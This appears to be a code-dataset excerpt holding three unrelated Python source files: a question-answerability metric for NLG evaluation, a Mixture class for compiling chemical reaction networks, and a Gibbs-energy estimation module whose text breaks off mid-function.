text stringlengths 957 885k |
|---|
<filename>nlgeval/pycocoevalcap/answerability/answerability_scorer.py<gh_stars>0
#!/usr/bin/env python
# answerability_scorer.py
import codecs
import json
import logging
import os
import sys
import tempfile
import numpy as np
import six
from six.moves import reload_module
from ..bleu.bleu import Bleu
from ..rouge.rouge import Rouge
#from nlgeval.pycocoevalcap.rouge.rouge import Rouge
from tokenizer.ptbtokenizer import PTBTokenizer
from six.moves import xrange as range
if six.PY2:
reload_module(sys)
sys.setdefaultencoding('utf-8')
stop_words = {"did", "have", "ourselves", "hers", "between", "yourself",
"but", "again", "there", "about", "once", "during", "out", "very",
"having", "with", "they", "own", "an", "be", "some", "for", "do", "its",
"yours", "such", "into", "of", "most", "itself", "other", "off", "is", "s",
"am", "or", "as", "from", "him", "each", "the", "themselves", "until", "below",
"are", "we", "these", "your", "his", "through", "don", "nor", "me", "were",
"her", "more", "himself", "this", "down", "should", "our", "their", "while",
"above", "both", "up", "to", "ours", "had", "she", "all", "no", "at", "any",
"before", "them", "same", "and", "been", "have", "in", "will", "on", "does",
"yourselves", "then", "that", "because", "over", "so", "can", "not", "now", "under",
"he", "you", "herself", "has", "just", "too", "only", "myself", "those", "i", "after",
"few", "t", "being", "if", "theirs", "my", "against", "a", "by", "doing", "it", "further",
"was", "here", "than"}
question_words_global = {'What', 'Which', 'Why', 'Who', 'Whom', 'Whose', 'Where', 'When', 'How', 'Is'}
question_words_global.update([w.lower() for w in question_words_global])
class COCOEvalCap:
def __init__(self, coco, cocoRes):
self.evalImgs = []
self.eval = {}
self.imgToEval = {}
self.coco = coco
self.cocoRes = cocoRes
self.params = {'image_id': coco.keys()}
def evaluate(self, ngram_metric):
imgIds = self.params['image_id']
# imgIds = self.coco.getImgIds()
gts = {}
res = {}
for imgId in imgIds:
gts[imgId] = self.coco[imgId]#.imgToAnns[imgId]
res[imgId] = self.cocoRes[imgId]#.imgToAnns[imgId]
# =================================================
# Set up scorers
# =================================================
tokenizer = PTBTokenizer()
gts = tokenizer.tokenize(gts)
res = tokenizer.tokenize(res)
# =================================================
# Set up scorers
# =================================================
if ngram_metric == 'ROUGE_L':
scorers = [
(Bleu(1), ["Bleu_1"]),
(Rouge(), "ROUGE_L")
]
else:
assert ngram_metric.startswith('Bleu_')
i = ngram_metric[len('Bleu_'):]
assert i.isdigit()
i = int(i)
assert i > 0
scorers = [
(Bleu(i), ['Bleu_{}'.format(j) for j in range(1, i + 1)]),
]
# =================================================
# Compute scores
# =================================================
for scorer, method in scorers:
score, scores = scorer.compute_score(gts, res)
if type(method) == list:
for sc, scs, m in zip(score, scores, method):
self.setEval(sc, m)
self.setImgToEvalImgs(scs, imgIds, m)
else:
self.setEval(score, method)
self.setImgToEvalImgs(scores, imgIds, method)
self.setEvalImgs()
return self.evalImgs
def setEval(self, score, method):
self.eval[method] = score
def setImgToEvalImgs(self, scores, imgIds, method):
for imgId, score in zip(imgIds, scores):
if imgId not in self.imgToEval:
self.imgToEval[imgId] = {}
self.imgToEval[imgId]["image_id"] = imgId
self.imgToEval[imgId][method] = score
def setEvalImgs(self):
self.evalImgs = [eval for imgId, eval in self.imgToEval.items()]
class AnswerabilityScorer(object):
def __init__(self, ngram_metric):
self.ngram_metric = ngram_metric
def remove_stopwords_and_NER_line(self, question, relevant_words=None, question_words=None):
if relevant_words is None:
question = question.split()
if question_words is None:
question_words = question_words_global
temp_words = []
for word in question_words:
for i, w in enumerate(question):
if w == word:
temp_words.append(w)
# If the question type is 'what' or 'which' the following word is generally associated with
# with the answer type. Thus it is important that it is considered a part of the question.
if i+1 < len(question) and (w.lower() == "what" or w.lower() == "which"):
temp_words.append(question[i+1])
question_split = [item for item in question if item not in temp_words]
ner_words = question_split
temp_words = []
for i in ner_words:
if i[0].isupper() == False:
if i not in stop_words :
temp_words.append(i)
return " ".join(temp_words)
else:
question_words = question.split()
temp_words = []
for i in question_words:
for j in relevant_words:
if j.lower() in i:
temp_words.append(i)
return " ".join(temp_words)
def NER_line(self, question):
q_types = question_words_global
question_words = question.split()
if question_words[0].lower() in q_types:
question_words = question_words[1:]
temp_words = []
for i in question_words:
if i[0].isupper():
temp_words.append(i)
return " ".join(temp_words)
def get_stopwords(self, question):
question_words = question.split()
temp_words = []
for i in question_words:
if i.lower() in stop_words:
temp_words.append(i.lower())
return " ".join(temp_words)
def loadJsonToMap(self, json_file):
with codecs.open(json_file, "r", encoding="utf-8", errors="ignore") as f:
data = json.load(f)
img_to_anns = {}
for entry in data:
if entry['image_id'] not in img_to_anns:
img_to_anns[entry['image_id']] = []
summary = dict(caption=entry['caption'], image_id=entry['caption'])
img_to_anns[entry['image_id']].append(summary)
return img_to_anns
def questiontype(self, question, questiontypes=None):
if questiontypes is None:
types = question_words_global
question = question.strip()
temp_words = []
question = question.split()
for word in types:
for i, w in enumerate(question):
if w == word:
temp_words.append(w)
if i+1 < len(question) and (w.lower() == "what" or w.lower() == "which"):
temp_words.append(question[i+1])
return " ".join(temp_words)
else:
for i in questiontypes:
if question.startswith(i + " "):
return i
else:
return " "
def _get_json_format_qbleu(self, lines, output_path_prefix, relevant_words=None, questiontypes=None):
if not os.path.exists(os.path.dirname(output_path_prefix)):
os.makedirs(os.path.dirname(output_path_prefix))
name = output_path_prefix + '_components'
pred_sents_impwords = []
pred_sents_ner = []
pred_sents_qt = []
pred_sents_sw = []
for line in lines:
line_impwords = self.remove_stopwords_and_NER_line(line, relevant_words)
line_ner = self.NER_line(line)
line_qt = self.questiontype(line, questiontypes)
line_sw = self.get_stopwords(line)
pred_sents_impwords.append(line_impwords)
pred_sents_ner.append(line_ner)
pred_sents_qt.append(line_qt)
pred_sents_sw.append(line_sw)
ref_files = [os.path.join(name + "_impwords"), os.path.join(name + "_ner"), os.path.join(name + "_qt"), os.path.join(name + "_fluent"), os.path.join(name + "_sw")]
data_pred_impwords = []
data_pred_qt = []
data_pred_ner = []
data_pred = []
data_pred_sw = []
for index, s in enumerate(pred_sents_impwords):
data_pred_impwords.append(dict(image_id=index, caption=s))
data_pred_qt.append(dict(image_id=index, caption=pred_sents_qt[index]))
data_pred_ner.append(dict(image_id=index, caption=pred_sents_ner[index]))
data_pred.append(dict(image_id=index, caption=lines[index]))
data_pred_sw.append(dict(image_id=index, caption=pred_sents_sw[index]))
with open(ref_files[0], 'w') as f:
json.dump(data_pred_impwords, f, separators=(',', ':'))
with open(ref_files[1], 'w') as f:
json.dump(data_pred_ner, f, separators=(',', ':'))
with open(ref_files[2], 'w') as f:
json.dump(data_pred_qt, f, separators=(',', ':'))
with open(ref_files[3], 'w') as f:
json.dump(data_pred, f, separators=(',', ':'))
with open(ref_files[4], 'w') as f:
json.dump(data_pred_sw, f, separators=(',', ':'))
return ref_files
def compute_answerability_scores(self, all_scores, ner_weight, qt_weight, re_weight, d, output_dir, ngram_metric="Bleu_4"):
fluent_scores = [x[ngram_metric] for x in all_scores]
imp_scores = [x['imp'] for x in all_scores]
qt_scores = [x['qt'] for x in all_scores]
sw_scores = [x['sw'] for x in all_scores]
ner_scores = [x['ner'] for x in all_scores]
new_scores = []
for i in range(len(imp_scores)):
answerability = re_weight*imp_scores[i] + ner_weight*ner_scores[i] + \
qt_weight*qt_scores[i] + (1-re_weight - ner_weight - qt_weight)*sw_scores[i]
temp = d*answerability + (1-d)*fluent_scores[i]
new_scores.append(temp)
mean_answerability_score = np.mean(new_scores)
mean_fluent_score = np.mean(fluent_scores)
return mean_answerability_score, mean_fluent_score
def calc_score(self, hypotheses, references):
ngram_metric = self.ngram_metric
ner_weight = 0.6
qt_weight = 0.2
re_weight = 0.1
delta = 0.7
data_type='SQuAD'
relevant_words = None
question_words = None
output_dir = tempfile.gettempdir()
filenames_1 = self._get_json_format_qbleu(references, os.path.join(output_dir, 'refs'),
relevant_words, question_words)
filenames_2 = self._get_json_format_qbleu(hypotheses, os.path.join(output_dir, 'hyps'),
relevant_words, question_words)
final_eval = []
final_eval_f = []
for file_1, file_2 in zip(filenames_1, filenames_2):
coco = self.loadJsonToMap(file_1)
os.remove(file_1)
cocoRes = self.loadJsonToMap(file_2)
os.remove(file_2)
cocoEval_precision = COCOEvalCap(coco, cocoRes)
cocoEval_recall = COCOEvalCap(cocoRes, coco)
cocoEval_precision.params['image_id'] = cocoRes.keys()
cocoEval_recall.params['image_id'] = cocoRes.keys()
eval_per_line_p = cocoEval_precision.evaluate(ngram_metric)
eval_per_line_r = cocoEval_recall.evaluate(ngram_metric)
f_score = zip(eval_per_line_p, eval_per_line_r)
temp_f = []
for p, r in f_score:
if (p['Bleu_1'] + r['Bleu_1'] == 0):
temp_f.append(0)
continue
temp_f.append(2 * (p['Bleu_1'] * r['Bleu_1']) / (p['Bleu_1'] + r['Bleu_1']))
final_eval_f.append(temp_f)
final_eval.append(eval_per_line_p)
metric_scores = [fl[ngram_metric] for fl in final_eval[3]] #only BLEU support
save_all = []
all_scores = zip(final_eval_f[0], final_eval_f[1], final_eval_f[2], final_eval_f[4],
metric_scores)
for imp, ner, qt, sw, metric_score in all_scores:
d = {'imp': imp, 'ner': ner, 'qt': qt, 'sw': sw, ngram_metric: metric_score}
save_all.append(d)
return self.compute_answerability_scores(save_all, ner_weight, qt_weight, re_weight, delta, output_dir, ngram_metric)
def compute_score(self, gts, res):
#only single-reference support now.
assert(gts.keys() == res.keys())
imgIds = gts.keys()
ground_truths = []
hypotheses = []
score = []
for id in imgIds:
hypo = res[id]
ref = gts[id]
ground_truths.append(ref[0])
hypotheses.append(hypo[0])
average_answerability_score, average_fluent_score = self.calc_score(hypotheses, ground_truths)
return average_answerability_score, average_fluent_score #this is different
|
# Copyright (c) 2020, Build-A-Cell. All rights reserved.
# See LICENSE file in the project root directory for details.
import copy
from typing import List, Union
from warnings import resetwarnings, warn
from .chemical_reaction_network import ChemicalReactionNetwork
from .component import Component
from .global_mechanism import GlobalMechanism
from .mechanism import Mechanism
from .parameter import ParameterDatabase
from .reaction import Reaction
from .species import Species
class Mixture(object):
def __init__(self, name="", mechanisms=None, components=None, parameters=None, parameter_file=None,
global_mechanisms=None, species=None, initial_condition_dictionary=None, **kwargs):
"""A Mixture object holds together all the components (DNA,Protein, etc), mechanisms (Transcription, Translation),
and parameters related to the mixture itself (e.g. Transcription rate). Default components and mechanisms can be
added as well as global mechanisms that impacts all species (e.g. cell growth).
:param name: Name of the mixture
:param mechanisms: Dictionary of mechanisms
:param components: List of components in the mixture (list of Components)
:param parameters: Dictionary of parameters (check parameters documentation for the keys)
:param parameter_file: Parameters can be loaded from a parameter file
:param default_mechanisms:
:param global_mechanisms: dict of global mechanisms that impacts all species (e.g. cell growth)
"""
# Initialize instance variables
self.name = name # Save the name of the mixture
# process the components
if components is None and not hasattr(self, "_components"):
self.components = []
else:
self.add_components(components)
# process mechanisms:
if mechanisms is None and not hasattr(self, "_mechanisms"):
self.mechanisms = {}
else:
self.add_mechanisms(mechanisms)
# process global_mechanisms:
# Global mechanisms are applied just once ALL species generated from
# components inside a mixture
# Global mechanisms should be used rarely, and with care. An example
# usecase is degradation via dilution.
if global_mechanisms is None and not hasattr(self, "_global_mechanisms"):
self.global_mechanisms = {}
else:
self.add_mechanisms(global_mechanisms)
# process the species
self.add_species(species)
# Create a paraemter database
self.parameter_database = ParameterDatabase(parameter_file = parameter_file, parameter_dictionary = parameters, **kwargs)
# Initial conditions are searched for by defauled in the parameter file
# see Mixture.set_initial_condition(self)
# These can be overloaded with custom_initial_condition dictionary: component.name --> initial amount
if initial_condition_dictionary is None:
self.initial_condition_dictionary = {}
else:
self.initial_condition_dictionary = dict(initial_condition_dictionary)
# CRN is stored here during compilation
self.crn = None
def add_species(self, species: Union[List[Species], Species]):
if not hasattr(self, "added_species"):
self.added_species = []
if species is not None:
if not isinstance(species, list):
species_list = [species]
else:
species_list = species
assert all(isinstance(x, Species) for x in species_list), 'only Species type is accepted!'
self.added_species += species_list
def set_species(self, species: Union[Species, str], material_type=None, attributes=None):
"""Used to set internal species from strings, Species or Components
:param species: name of a species or a species instance
:param material_type: material type of a species as a string
:param attributes: Species attribute
:return: Species in the mixture
"""
if isinstance(species, Species):
return species
elif isinstance(species, str):
return Species(name=species, material_type=material_type, attributes=attributes)
elif isinstance(species, Component) and species.get_species() is not None:
return species.get_species()
else:
raise ValueError("Invalid Species: string, chemical_reaction_network.Species or Component with implemented .get_species() required as input.")
@property
def components(self):
return self._components
@components.setter
def components(self, components):
self._components = []
self.add_components(components)
def add_component(self, component):
"""this function adds a single component to the mixture."""
if not hasattr(self, "_components"):
self.components = []
if isinstance(component, list):
self.add_components(component)
else:
assert isinstance(component, Component), "the object: %s passed into mixture as component must be of the class Component" % str(component)
# Check if component is already in self._components
for comp in self._components:
if type(comp) == type(component) and comp.name == component.name:
raise ValueError(f"{comp} of the same type and name already in Mixture!")
else:
# Components are copied before being added to Mixtures
component_copy = copy.deepcopy(component)
component_copy.set_mixture(self)
self.components.append(component_copy)
def get_mechanism(self, mechanism_type):
"""Searches the Mixture for a Mechanism of the correct type.
If no Mechanism is found, None is returned.
"""
if not isinstance(mechanism_type, str):
raise TypeError(f"mechanism_type must be a string. Recievied {mechanism_type}.")
if mechanism_type in self.mechanisms:
return self.mechanisms[mechanism_type]
else:
return None
def add_components(self, components: Union[List[Component], Component]):
"""This function adds a list of components to the mixture.
"""
if isinstance(components, Component):
self.add_component(components)
elif isinstance(components, List):
for component in components:
self.add_component(component)
else:
raise ValueError(f"add_components expected a list of Components. Received {components}")
def get_component(self, component=None, name=None, index=None):
"""Function to get components from Mixture._components.
One of the 3 keywords must not be None.
:param component: an instance of a component. Searches Mixture._components for a Component with the same type and name.
:param name: str. Searches Mixture._components for a Component with the same name
:param index: int. returns Mixture._components[index]
:return: if nothing is found, returns None.
"""
if [component, name, index].count(None) != 2:
raise ValueError(f"get_component requires a single keyword. Received component={component}, name={name}, index={index}.")
if not (isinstance(component, Component) or component is None):
raise ValueError(f"component must be of type Component. Received {component}.")
if not (isinstance(name, str) or name is None):
raise ValueError(f"name must be of type str. Received {name}.")
if not (isinstance(index, int) or index is None):
raise ValueError(f"index must be of type int. Received {index}.")
matches = []
if index is not None:
matches.append(self.components[index])
else:
for comp in self.components:
if component is not None:
if type(comp) == type(component) and comp.name == component.name:
matches.append(comp)
elif name is not None:
if comp.name == name:
matches.append(comp)
if len(matches) == 0:
return None
elif len(matches) == 1:
return matches[0]
else:
warn("get_component found multiple matching components. A list has been returned.")
return matches
@property
def mechanisms(self):
"""mechanisms stores Mixture Mechanisms."""
return self._mechanisms
@mechanisms.setter
def mechanisms(self, mechanisms):
self._mechanisms = {}
self.add_mechanisms(mechanisms, overwrite=True)
def add_mechanism(self, mechanism, mech_type=None, overwrite=False):
"""adds a mechanism of type mech_type to the Mixture mechanism_dictionary.
:param mechanism: a Mechanism instance
:param mech_type: the type of mechanism. defaults to mechanism.mech_type if None
:param overwrite: whether to overwrite existing mechanisms of the same type (default False)
:return:
"""
if not hasattr(self, "_mechanisms"):
self._mechanisms = {}
if not isinstance(mechanism, Mechanism):
raise TypeError(f"mechanism must be a Mechanism. Received {mechanism}.")
if mech_type is None:
mech_type = mechanism.mechanism_type
if not isinstance(mech_type, str):
raise TypeError(f"mechanism keys must be strings. Received {mech_type}")
if isinstance(mechanism, GlobalMechanism):
self.add_global_mechanism(mechanism, mech_type, overwrite)
elif isinstance(mechanism, Mechanism):
if mech_type in self._mechanisms and not overwrite:
raise ValueError(f"mech_type {mech_type} already in Mixture {self}. To overwrite, use keyword overwrite = True.")
else:
self._mechanisms[mech_type] = copy.deepcopy(mechanism)
def add_mechanisms(self, mechanisms, overwrite=False):
"""This function adds a list or dictionary of mechanisms to the mixture.
Can take both GlobalMechanisms and Mechanisms
:param mechanisms: a Mechanism instance
:param overwrite: whether to overwrite existing mechanisms of the same type (default False)
:return:
"""
if isinstance(mechanisms, Mechanism):
self.add_mechanism(mechanisms, overwrite = overwrite)
elif isinstance(mechanisms, dict):
for mech_type in mechanisms:
self.add_mechanism(mechanisms[mech_type], mech_type, overwrite = overwrite)
elif isinstance(mechanisms, list):
for mech in mechanisms:
self.add_mechanism(mech, overwrite = overwrite)
else:
raise ValueError(f"add_mechanisms expected a list of Mechanisms. Recieved {mechanisms}")
@property
def global_mechanisms(self):
"""global_mechanisms stores global Mechanisms in the Mixture."""
return self._global_mechanisms
@global_mechanisms.setter
def global_mechanisms(self, mechanisms):
self._global_mechanisms = {}
if isinstance(mechanisms, dict):
for mech_type in mechanisms:
self.add_global_mechanism(mechanisms[mech_type], mech_type, overwrite = True)
elif isinstance(mechanisms, list):
for mech in mechanisms:
self.add_global_mechanism(mech, overwrite = True)
def add_global_mechanism(self, mechanism, mech_type = None, overwrite = False):
"""adds a mechanism of type mech_type to the Mixture global_mechanism dictonary.
keywordS:
mechanism: a Mechanism instance
mech_type: the type of mechanism. defaults to mechanism.mech_type if None
overwrite: whether to overwrite existing mechanisms of the same type (default False)
"""
if not hasattr(self, "_global_mechanisms"):
self._global_mechanisms = {}
if not isinstance(mechanism, GlobalMechanism):
raise TypeError(f"mechanism must be a GlobalMechanism. Recieved {mechanism}.")
if mech_type is None:
mech_type = mechanism.mechanism_type
if not isinstance(mech_type, str):
raise TypeError(f"mechanism keys must be strings. Recieved {mech_type}")
if mech_type in self._mechanisms and not overwrite:
raise ValueError(f"mech_type {mech_type} already in Mixture {self}. To overwrite, use keyword overwrite = True.")
else:
self._global_mechanisms[mech_type] = copy.deepcopy(mechanism)
def update_parameters(self, parameter_file = None, parameters = None, overwrite_parameters = True):
if parameter_file is not None:
self.parameter_database.load_parameters_from_file(parameter_file, overwrite_parameters = overwrite_parameters)
if parameters is not None:
self.parameter_database.load_parameters_from_dictionary(parameters, overwrite_parameters = overwrite_parameters)
def get_parameter(self, mechanism, part_id, param_name):
param = self.parameter_database.find_parameter(mechanism, part_id, param_name)
return param
def set_initial_condition(self, s: Species, component=None):
"""
Tries to find an initial condition of species s using the parameter hierarchy
1. Tries to find the initial concentration in the Component initial_Concentration_dictionary and ParameterDatabase
2. Tries to find self.name, repr(s) in self.initial_condition_dictionary
3. Tries to find repr(s) in self.initial_condition_dictionary
4. if s == component.get_species(), tries to find (None, self.name, component.name) in self.initial_condition_dictionary
5. if s == component.get_species(), tries to find component.name in self.initial_condition_dictionary
6. tries to find (None, self.name, repr(s)) in self.parameter_database
7. tries to find repr(s) in self.parameter_database
8. if s == component.get_species(), tries to find (None, self.name, component.name) in self.parameter_database
9. if s == component.get_species(), tries to find component.name in self.parameter_database
10-. defaults to 0
:param s:
:param component:
:return:
"""
if not isinstance(s, Species):
raise ValueError(f"{s} is not a Species! Can only set initial concentration of a Species.")
init_conc = None
#1
if component is not None:
init_conc = component.get_initial_condition(s)
if init_conc is None:
#2
if (self.name, repr(s)) in self.initial_condition_dictionary:
init_conc = self.initial_condition_dictionary[(self.name, repr(s))]
#3
elif repr(s) in self.initial_condition_dictionary:
init_conc = self.initial_condition_dictionary[repr(s)]
#4
elif component is not None and component.get_species() == s and (self.name, component.name) in self.initial_condition_dictionary:
return self.initial_condition_dictionary[(self.name, component.name)]
#5
elif component is not None and component.get_species() == s and component.name in self.initial_condition_dictionary:
return self.initial_condition_dictionary[component.name]
#6
elif self.parameter_database.find_parameter(None, self.name, repr(s)) is not None:
init_conc = self.parameter_database.find_parameter(None, self.name, repr(s)).value
#7
elif self.parameter_database.find_parameter(None, None, repr(s)) is not None:
init_conc = self.parameter_database.find_parameter(None, None, repr(s)).value
#8
elif component is not None and component.get_species() == s and (None, self.name, component.name) in self.parameter_database:
return self.parameter_database.find_parameter(None, self.name, component.name).value
#9
elif component is not None and component.get_species() == s and component.name in self.parameter_database:
return self.parameter_database.find_parameter(None, None, component.name).value
#10
else:
init_conc = 0
s.initial_concentration = init_conc
def add_species_to_crn(self, new_species, component):
if self.crn is None:
self.crn = ChemicalReactionNetwork(species = [], reactions = [])
if isinstance(new_species, Species):
new_species = [new_species]
for s in new_species:
if isinstance(s, Species):
self.set_initial_condition(s, component)
self.crn.add_species(s)
elif isinstance(s, list) and(all(isinstance(ss, Species) for ss in s) or len(s) == 0):
for ss in s:
self.set_initial_condition(ss, component)
self.crn.add_species(s)
elif s is not None:
raise ValueError(f"Invalid Species Returned in {component}.update_species(): {s}.")
def apply_global_mechanisms(self, species) -> (List[Species], List[Reaction]):
# update with global mechanisms
global_mech_species = []
global_mech_reactions = []
if self.global_mechanisms:
for mech in self.global_mechanisms:
# Update Global Mechanisms
global_mech_species += self.global_mechanisms[mech].update_species_global(species, self)
global_mech_reactions += self.global_mechanisms[mech].update_reactions_global(species, self)
self.add_species_to_crn(global_mech_species, component = None)
self.crn.add_reactions(global_mech_reactions)
def compile_crn(self) -> ChemicalReactionNetwork:
"""Creates a chemical reaction network from the species and reactions associated with a mixture object.
:return: ChemicalReactionNetwork
"""
resetwarnings()#Reset warnings - better to toggle them off manually.
#reset the Components' mixture to self - in case they have been added to other Mixtures
for c in self.components:
c.set_mixture(self)
#Create a CRN to filter out duplicate species
self.crn = ChemicalReactionNetwork([], [])
#add the extra species to the CRN
self.add_species_to_crn(self.added_species, component = None)
#Append Species from each Component
for component in self.components:
self.add_species_to_crn(component.update_species(), component)
#Append Reactions from each Component
for component in self.components:
self.crn.add_reactions(component.update_reactions())
#global mechanisms are applied last and only to all the species
#the reactions and species are added to the CRN
self.apply_global_mechanisms(self.crn.species)
return self.crn
def __str__(self):
return type(self).__name__ + ': ' + self.name
def __repr__(self):
txt = str(self)+"\n"
if self.components:
txt += "Components = ["
for comp in self.components:
txt+="\n\t"+str(comp)
if self.mechanisms:
txt+=" ]\nMechanisms = {"
for mech in self.mechanisms:
txt+="\n\t"+mech+":"+self.mechanisms[mech].name
if self.global_mechanisms:
txt+=" }\nGlobal Mechanisms = {"
for mech in self.global_mechanisms:
txt+="\n\t"+mech+":"+self.global_mechanisms[mech].name
txt+=" }"
return txt
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 6 15:47:09 2017
@author: noore
"""
import logging
from numpy import matrix, array, load, zeros, logaddexp, sqrt, log
import os
import json
import gzip
import types
import re
COMPOUND_JSON_FNAME = 'cc_compounds.json.gz'
PREPROCESS_FNAME = 'cc_preprocess.npz'
R = 8.31e-3 # kJ/(K*mol)
DEFAULT_TEMP = 298.15 # K
DEFAULT_IONIC_STRENGTH = 0.1 # mM
DEFAULT_PH = 7.0
DEFAULT_PMG = 14.0
DEFAULT_PHASE = 'aqueous'
RT = R * DEFAULT_TEMP
RTlog10 = RT * log(10)
DEBYE_HUECKLE_A = 2.91482
DEBYE_HUECKLE_B = 1.6
MG_FORMATION_ENERGY = -455.3 # kJ/mol, formation energy of Mg2+
class Species(object):
def __init__(self, d):
self.dG0_f = d['dG0_f']
self.phase = d['phase']
self.nH = d['nH']
self.nMg = d['nMg']
self.z = d['z']
def ddG_prime(self, pH, pMg, I):
"""
Transform this individual estimate to difference conditions.
"""
sqrt_I = sqrt(I)
ddG_prime = 0
# add the potential related to the pH
if self.nH > 0:
ddG_prime += self.nH * RTlog10 * pH
# add the potential related to the ionic strength
ddG_prime -= DEBYE_HUECKLE_A * (self.z ** 2 - self.nH) * sqrt_I / (1.0 + DEBYE_HUECKLE_B * sqrt_I)
# add the potential related to the Mg ions
if self.nMg > 0:
ddG_prime += self.nMg * (RTlog10 * pMg - MG_FORMATION_ENERGY)
return ddG_prime
def dG0_prime(self, pH, pMg, I):
"""
Transform this individual estimate to difference conditions.
"""
dG0_f_prime = self.dG0_f + self.ddG_prime(pH, pMg, I)
logging.info('nH = %2d, nMg = %2d, z = %2d, dG0_f = %6.1f -> dG\'0_f = %6.1f' %
(self.nH, self.nMg, self.z, self.dG0_f, dG0_f_prime))
return dG0_f_prime
class Compound(object):
def __init__(self, d):
self.inchi = d.get('InChI', '')
self.kegg_id = d['CID']
self.compound_index = d.get('compound_index', -1)
self.group_vector = d.get('group_vector', None)
self.formula = d.get('formula', '')
self.mass = d.get('mass', -1)
self.num_electrons = d.get('num_electrons', 0)
self.no_dg_explanation = d.get('error', '')
if 'pmap' in d:
self.source = d['pmap'].get('source', '')
self.species_list = map(Species, d['pmap'].get('species', []))
self.phase = DEFAULT_PHASE
for sp in self.species_list:
if sp.phase != DEFAULT_PHASE:
if len(self.species_list) > 1:
raise ValueError('compound in non-aqueous phase must '
'have only one species')
self.phase = sp.phase
def get_stoich_vector(self, Nc):
x = matrix(zeros((Nc, 1)))
i = self.compound_index
if i is None:
raise Exception('could not find index for ' + self.kegg_id)
x[i, 0] = 1
return x
def get_group_incidence_vector(self, Ng):
g = matrix(zeros((Ng, 1)))
gv = self.group_vector
if gv is None:
raise Exception('could not find group vector for ' + self.kegg_id)
for g_ind, g_count in gv:
g[g_ind, 0] += g_count
return g
def dG0_prime(self, pH, pMg, I):
"""
Get a detla-deltaG estimate for this group of species.
I.e., this is the difference between the dG0 and the dG'0, which
only depends on the pKa of the pseudoisomers, but not on their
formation energies.
Args:
pH - the pH to estimate at.
pMg - the pMg to estimate at.
I - the ionic strength to estimate at.
Returns:
The estimated delta G in the given conditions or None.
"""
if self.phase == DEFAULT_PHASE:
# Compute per-species transforms, scaled down by R*T.
dG0_prime_vec = array(map(lambda s: s.dG0_prime(pH, pMg, I),
self.species_list))
# Numerical issues: taking a sum of exp(v) for |v| quite large.
# Use the fact that we take a log later to offset all values by a
# constant (the minimum value).
dG0_f_prime = -RT * logaddexp.reduce((-1.0 / RT) * dG0_prime_vec)
else:
dG0_f_prime = self.species_list[0].dG0_prime(pH, pMg, I)
logging.info('KEGG_ID = %s, dG\'0_f = %.1f' % (self.kegg_id, dG0_f_prime))
return dG0_f_prime
class Reaction(object):
# load formation energies from the JSON file
COMPOUND_DICT = {}
for cd in json.load(gzip.open(COMPOUND_JSON_FNAME, 'r')):
kegg_id = cd.get('CID', 'unknown')
COMPOUND_DICT[kegg_id] = cd
def __init__(self, kegg_id_to_coeff):
self.kegg_id_to_coeff = kegg_id_to_coeff
# Create the relevant "Compound" objects and store in a dictionary
self.kegg_id_to_compound = {}
for kegg_id in self.kegg_id_to_coeff.keys():
compound = Compound(Reaction.COMPOUND_DICT[kegg_id])
self.kegg_id_to_compound[kegg_id] = compound
def kegg_ids(self):
return self.kegg_id_to_coeff.keys()
def get_coeff(self, kegg_id):
return self.kegg_id_to_coeff.get(kegg_id, 0)
def get_compound(self, kegg_id):
return self.kegg_id_to_compound.get(kegg_id, None)
def dG0_prime(self, pH, pMg, I):
dG0_r_prime = 0
for kegg_id in self.kegg_ids():
coeff = self.get_coeff(kegg_id)
compound = self.get_compound(kegg_id)
dG0_r_prime += coeff * compound.dG0_prime(pH, pMg, I)
return dG0_r_prime
@staticmethod
def parse_reaction_formula_side(s):
"""
Parses the side formula, e.g. '2 C00001 + C00002 + 3 C00003'
Ignores stoichiometry.
Returns:
The set of CIDs.
"""
if s.strip() == "null":
return {}
compound_bag = {}
for member in re.split('\s+\+\s+', s):
tokens = member.split(None, 1)
if len(tokens) == 0:
continue
if len(tokens) == 1:
amount = 1
key = member
else:
amount = float(tokens[0])
key = tokens[1]
compound_bag[key] = compound_bag.get(key, 0) + amount
return compound_bag
@staticmethod
def parse_formula(formula, arrow='='):
"""
Parses a two-sided formula such as: 2 C00001 => C00002 + C00003
Return:
The set of substrates, products and the direction of the reaction
"""
tokens = formula.split(arrow)
if len(tokens) < 2:
raise ValueError('Reaction does not contain the arrow sign (%s): %s'
% (arrow, formula))
if len(tokens) > 2:
raise ValueError('Reaction contains more than one arrow sign (%s): %s'
% (arrow, formula))
left = tokens[0].strip()
right = tokens[1].strip()
sparse_reaction = {}
for cid, count in Reaction.parse_reaction_formula_side(left).iteritems():
sparse_reaction[cid] = sparse_reaction.get(cid, 0) - count
for cid, count in Reaction.parse_reaction_formula_side(right).iteritems():
sparse_reaction[cid] = sparse_reaction.get(cid, 0) + count
return Reaction(sparse_reaction)
class Preprocessing(object):
def __init__(self):
# load pre-processing matrices (for the uncertainty estimation)
relpath = os.path.dirname(os.path.realpath(__file__))
cc_preprocess_fname = os.path.join(relpath, PREPROCESS_FNAME)
cc_preprocess = load(cc_preprocess_fname)
self.v_r = matrix(cc_preprocess['v_r'])
self.v_g = matrix(cc_preprocess['v_g'])
self.C1 = matrix(cc_preprocess['C1'])
self.C2 = matrix(cc_preprocess['C2'])
self.C3 = matrix(cc_preprocess['C3'])
self.G1 = matrix(cc_preprocess['G1'])
self.G2 = matrix(cc_preprocess['G2'])
self.G3 = matrix(cc_preprocess['G3'])
self.S = matrix(cc_preprocess['S'])
self.kegg_ids = cc_preprocess['cids']
self.Nc = self.C1.shape[0]
self.Ng = self.C3.shape[0]
assert self.C1.shape[0] == self.C1.shape[1]
assert self.C1.shape[1] == self.C2.shape[0]
assert self.C2.shape[1] == self.C3.shape[0]
assert self.C3.shape[0] == self.C3.shape[1]
assert self.C3.shape[0] == self.C3.shape[1]
def reaction_to_vectors(self, reaction):
# x is the stoichiometric vector of the reaction, only for the
# compounds that appeared in the original training set for CC
x = matrix(zeros((self.Nc, 1)))
# g is the group incidence vector of all the other compounds
g = matrix(zeros((self.Ng, 1)))
for kegg_id in reaction.kegg_ids():
coeff = reaction.get_coeff(kegg_id)
compound = reaction.get_compound(kegg_id)
x += coeff * compound.get_stoich_vector(self.Nc)
g += coeff * compound.get_group_incidence_vector(self.Ng)
return x, g
def reactions_to_matrices(self, reactions):
"""
Arguments:
reaction - a KeggReaction object
Returns:
X - the stoichiometric matrix of the reactions (only
for compounds that appear in the original training
set of CC)
G - the group incidence matrix (of all other compounds)
"""
X = matrix(zeros((self.Nc, len(reactions))))
G = matrix(zeros((self.Ng, len(reactions))))
for i, reaction in enumerate(reactions):
x, g = self.reaction_to_vectors(reaction)
